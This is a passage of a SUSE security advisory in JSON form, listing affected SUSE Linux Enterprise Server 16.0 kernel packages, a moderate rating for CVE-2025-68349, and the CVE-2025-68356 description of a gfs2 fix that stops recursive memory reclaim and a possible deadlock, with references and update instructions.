"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68356",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68356"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Prevent recursive memory reclaim\n\nFunction new_inode() returns a new inode with inode-\u003ei_mapping-\u003egfp_mask\nset to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so\nallocations in that address space can recurse into filesystem memory\nreclaim. We don\u0027t want that to happen because it can consume a\nsignificant amount of stack memory.\n\nWorse than that is that it can also deadlock: for example, in several\nplaces, gfs2_unstuff_dinode() is called inside filesystem transactions.\nThis calls filemap_grab_folio(), which can allocate a new folio, which\ncan trigger memory reclaim. If memory reclaim recurses into the\nfilesystem and starts another transaction, a deadlock will ensue.\n\nTo fix these kinds of problems, prevent memory reclaim from recursing\ninto filesystem code by making sure that the gfp_mask of inode address\nspaces doesn\u0027t include __GFP_FS.\n\nThe \"meta\" and resource group address spaces were already using GFP_NOFS\nas their gfp_mask (which doesn\u0027t include __GFP_FS). The default value\nof GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To\navoid being overly limiting, use the default value and only knock off\nthe __GFP_FS flag. I\u0027m not sure if this will actually make a\ndifference, but it also shouldn\u0027t hurt.\n\nThis patch is loosely based on commit ad22c7a043c2 (\"xfs: prevent stack\noverflows from page cache allocation\").\n\nFixes xfstest generic/273.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68356",
"url": "https://www.suse.com/security/cve/CVE-2025-68356"
},
{
"category": "external",
"summary": "SUSE Bug 1255593 for CVE-2025-68356",
"url": "https://bugzilla.suse.com/1255593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
